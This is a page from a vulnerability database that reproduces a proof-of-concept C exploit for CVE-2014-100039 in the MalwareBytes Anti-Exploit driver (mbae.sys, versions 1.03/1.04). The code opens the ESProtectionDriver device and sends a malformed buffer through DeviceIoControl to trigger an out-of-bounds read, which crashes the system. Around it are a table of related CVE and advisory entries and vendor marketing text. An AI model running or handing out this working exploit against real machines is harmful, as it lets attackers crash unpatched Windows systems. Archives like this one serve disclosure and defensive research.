Vulners
Lucene search
MalwareBytes Anti-Exploit 1.03.1.1220, 1.04.1.1012 Out-of-bounds Read DoS Exploit
| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
 | CVE-2014-10003 | 13 Jan 201511:00 | – | cve |
| CVE-2014-100039 | 13 Jan 201515:00 | – | cve |
 | CVE-2014-10003 | 13 Jan 201511:00 | – | cvelist |
| CVE-2014-100039 | 13 Jan 201515:00 | – | cvelist |
 | Malwarebytes Anti-Exploit 1.03.1.1220/1.04.1.1012 - Out-of-Bounds Read Denial of Service | 20 Jan 201500:00 | – | exploitdb |
 | EUVD-2014-1070 | 7 Oct 202500:30 | – | euvd |
| EUVD-2014-1075 | 7 Oct 202500:30 | – | euvd |
 | Malwarebytes Anti-Exploit 1.03.1.12201.04.1.1012 - Out-of-Bounds Read Denial of Service | 20 Jan 201500:00 | – | exploitpack |
 | Malwarebytes Anti-Exploit < 1.05.1.1014 DoS | 3 Jun 201500:00 | – | nessus |
 | CVE-2014-10003 | 13 Jan 201511:59 | – | nvd |
10
/*
Exploit Title - MalwareBytes Anti-Exploit Out-of-bounds Read DoS
Date - 19th January 2015
Discovered by - Parvez Anwar (@parvezghh)
Vendor Homepage - https://www.malwarebytes.org
Tested Version - 1.03.1.1220, 1.04.1.1012
Driver Version - no version set - mbae.sys
Tested on OS - 32bit Windows XP SP3 and Windows 7 SP1
OSVDB - http://www.osvdb.org/show/osvdb/114249
CVE ID - CVE-2014-100039
Vendor fix url - https://forums.malwarebytes.org/index.php?/topic/158251-malwarebytes-anti-exploit-hall-of-fame/
Fixed version - 1.05
Fixed driver ver - no version set
*/
#include <stdio.h>
#include <windows.h>
#define BUFSIZE 25
int main(int argc, char *argv[])
{
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
BYTE sizebytes[4] = "\xff\xff\xff\x00";
BYTE *inbuffer;
printf("-------------------------------------------------------------------------------\n");
printf(" MalwareBytes Anti-Exploit (mbae.sys) Out-of-bounds Read DoS \n");
printf(" Tested on Windows XP SP3/Windows 7 SP1 (32bit) \n");
printf("-------------------------------------------------------------------------------\n\n");
sprintf(devhandle, "\\\\.\\%s", "ESProtectionDriver");
inbuffer = VirtualAlloc(NULL, BUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
memset(inbuffer, 0x41, BUFSIZE);
memcpy(inbuffer, sizebytes, sizeof(sizebytes));
printf("\n[i] Size of total buffer being sent %d bytes", BUFSIZE);
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to DoS . . .");
getch();
DeviceIoControl(hDevice, 0x0022e000, inbuffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);
printf("\n[+] DoS buffer sent\n\n");
CloseHandle(hDevice);
return 0;
}
# 0day.today [2018-04-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Jan 2015 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.00473